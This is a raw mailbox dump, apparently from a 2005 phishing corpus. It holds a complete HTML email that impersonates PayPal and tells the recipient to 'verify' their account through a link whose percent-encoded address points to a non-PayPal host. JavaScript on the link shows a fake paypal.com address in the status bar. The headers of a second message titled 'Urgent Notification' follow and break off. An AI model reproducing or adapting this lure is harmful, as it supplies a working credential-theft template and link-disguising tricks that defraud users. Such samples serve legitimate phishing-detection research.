From: "PayPal" <service@paypal.com>
To: <username@domain.com>
Subject: PayPal Account Security Measures
Date: Mon, 07 Mar 05 02:02:57 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F8A____.3C4DB_1"
X-Priority: 3
X-MSMail-Priority: Normal
Status: O
X-Status: 
X-Keywords:                  
X-UID: 185

This is a multi-part message in MIME format.

--F8A____.3C4DB_1
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

</style>
</head>

<BODY><TABLE><TR><TD bgcolor=3D"#ffffff">
<table width=3D"600" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" alig=
n=3D"center">
<tr valign=3D"top">
	<td><a href=3D"https://www.paypal.com/us" target=3D"_blank" ><img src=3D"=
http://images.paypal.com/en_US/i/logo/email_logo.gif" alt=3D"PayPal" borde=
r=3D"0"></a></td>
</tr>
</table>

<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0">
<tr>
	<td background=3D"http://images.paypal.com/images/bg_clk.gif" width=3D"10=
0%"><img src=3D"http://images.paypal.com/images/pixel.gif" height=3D"29" w=
idth=3D"1" border=3D"0"></td>
</tr>
<tr>
	<td><img src=3D"http://images.paypal.com/images/pixel.gif" height=3D"10" =
width=3D"1" border=3D"0"></td>
</tr>
</table>

<table width=3D"600" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" alig=
n=3D"center">
<tr valign=3D"top">
	<td width=3D"400">
	<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"5" border=3D"0">
		<tr>
			<td>Dear PayPal Member,<br><br>
Your account has been randomly flagged in our system as a part of our rout=
ine security measures. 
This is a must to ensure that only you have access and use of your PayPal =
account and to ensure a safe PayPal experience. We require all flagged acc=
ounts to verify their information on file with us. To verify your Informat=
ion at this time, please visit our secure server webform by clicking the h=
yperlink below
<br><br>
 
<table width=3D"75%" cellpadding=3D"1" cellspacing=3D"0" border=3D"0" bgco=
lor=3D"#FFE65C" align=3D"left">
<tr>
<td>
	<table width=3D"100%" cellpadding=3D"4" cellspacing=3D"0" border=3D"0" bg=
color=3D"#FFFECD" align=3D"center">
		<tr>
			<td class=3D"pp_sansserif" align=3D"center"><a href=3D"http://%64%38%31=
%31%30%33%39%2E%75%34%37%2E%6A%6F%64%6F%73%68%61%72%65%64%2E%63%6F%6D/%70%=
63/" 
    onMouseOver=3D"window.status=3D'https://www.paypal.com';return true;" =

    onMouseOut=3D"window.status=3D' '; return true;">Click here to verify =
your Information</a>

</td>
		</tr>
	</table>
</td>
</tr>
</table>

<br>
<br>
<br>
 Thank you for using PayPal!<br>
The PayPal Team</td>
</tr>

<tr>
<td>
<hr class=3D"dotted">
</td>
</tr>

<tr>
<td>
<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0">
<tr>
<td class=3D"pp_footer">Please do not reply to this e-mail. Mail sent
to this address cannot be answered. For assistance, log
in</a> to your PayPal account and choose the "Help" link in the
footer of any page.<br>
<br class=3D"h10">
 To receive email notifications in plain text instead of HTML,
update your preferences <a href=3D"https://www.paypal.com/us/PREFS-NOTI" t=
arget=3D"_blank" > here</a>.</td>
</tr>

<tr>
	<td><img src=3D"http://images.paypal.com/en_US/i/scr/pixel.gif" height=3D=
"10" width=3D"1" border=3D"0"></td>
</tr>
</table>
</td>
</tr>

<tr>
	<td><br><span class=3D"pp_footer">PayPal Email ID PP478<br><br></span></t=
d>
</tr>
</table>
</td>
<td><img src=3D"http://images.paypal.com/en_US/i/scr/pixel.gif" height=3D"=
1" width=3D"10" border=3D"0"></td>
<td width=3D"190" valign=3D"top">
<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"1" border=3D"0" bgc=
olor=3D"#CCCCCC">
<tr>
	<td>
	<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" bg=
color=3D"#ffffff">
	<tr>
	<td>
		<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"5" border=3D"0" b=
gcolor=3D"#EEEEEE">
		<tr>
		<td class=3D"pp_sidebartextbold" align=3D"center">Protect Your Account I=
nfo</td>
		</tr>
		</table>
		
<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"5" border=3D"0">
<tr>
<td class=3D"pp_sidebartext">Make sure you never provide your
password to fraudulent websites.<br>
<br>
To safely and securely access the PayPal website or your account,
open up a new web browser (e.g. Internet Explorer or Netscape) and
type in the PayPal URL (http://www.paypal.com/).<br>
<br>
PayPal will never ask you to enter your password in an email.<br>
<br>
 For more information on protecting yourself from fraud, please
review our Security Tips at http://www.paypal.com/securitytips<br>
<img src=3D"http://images.paypal.com/en_US/images/pixel.gif" height=3D
"5" width=3D"1" border=3D"0"></td>
</tr>
</table>
</td>
</tr>

--F8A____.3C4DB_1--

From apache@66-194-152-221.gen.twtelecom.net  Sun Mar  6 17:26:40 2005
Return-Path: <apache@66-194-152-221.gen.twtelecom.net>
X-Original-To: username@login.domain.com
Delivered-To: username@login.domain.com
Received: from mail1.domain.com (mail1.domain.com [10.23.1.4])
	by spanky.domain.com (Postfix) with ESMTP id 7D2CF536E9B
	for <username@login.domain.com>; Sun,  6 Mar 2005 17:26:40 -0500 (EST)
Received: from lujan.uninet.edu (bio.hgy.es [193.146.180.21])
	by mail1.domain.com (Postfix) with ESMTP id 92D1485ADDE
	for <username@domain.com>; Sun,  6 Mar 2005 17:15:23 -0500 (EST)
Received: by lujan.uninet.edu (Postfix)
	id 8E6BD1BB25; Sun,  6 Mar 2005 23:26:44 +0100 (CET)
Delivered-To: user@example.edu
Received: from localhost (unknown [127.0.0.1])
	by lujan.uninet.edu (Postfix) with ESMTP id CE9CA1BB11
	for <user@example.edu>; Sun,  6 Mar 2005 22:26:43 +0000 (UTC)
Received: from lujan.uninet.edu ([193.146.180.21])
	by localhost (lujan [193.146.180.21]) (amavisd-new, port 10024)
	with ESMTP id 24881-05 for <user@example.edu>;
	Sun, 6 Mar 2005 23:26:31 +0100 (CET)
Received: from 66-194-152-221.gen.twtelecom.net (unknown [66.194.152.221])
	by lujan.uninet.edu (Postfix) with ESMTP id 663E41BB01
	for <user@example.edu>; Sun,  6 Mar 2005 23:26:29 +0100 (CET)
Received: from 66-194-152-221.gen.twtelecom.net (localhost [127.0.0.1])
	by 66-194-152-221.gen.twtelecom.net (8.12.8/8.12.8) with ESMTP id j26MQK6N021030
	for <user@example.edu>; Sun, 6 Mar 2005 17:26:20 -0500
Received: (from apache@localhost)
	by 66-194-152-221.gen.twtelecom.net (8.12.8/8.12.8/Submit) id j26MQJ0M021028
	for user@example.edu; Sun, 6 Mar 2005 17:26:19 -0500
Date: Sun, 6 Mar 2005 17:26:19 -0500
Message-Id: <200503062226.j26MQJ0M021028@66-194-152-221.gen.twtelecom.net>
Subject: Urgent Notification
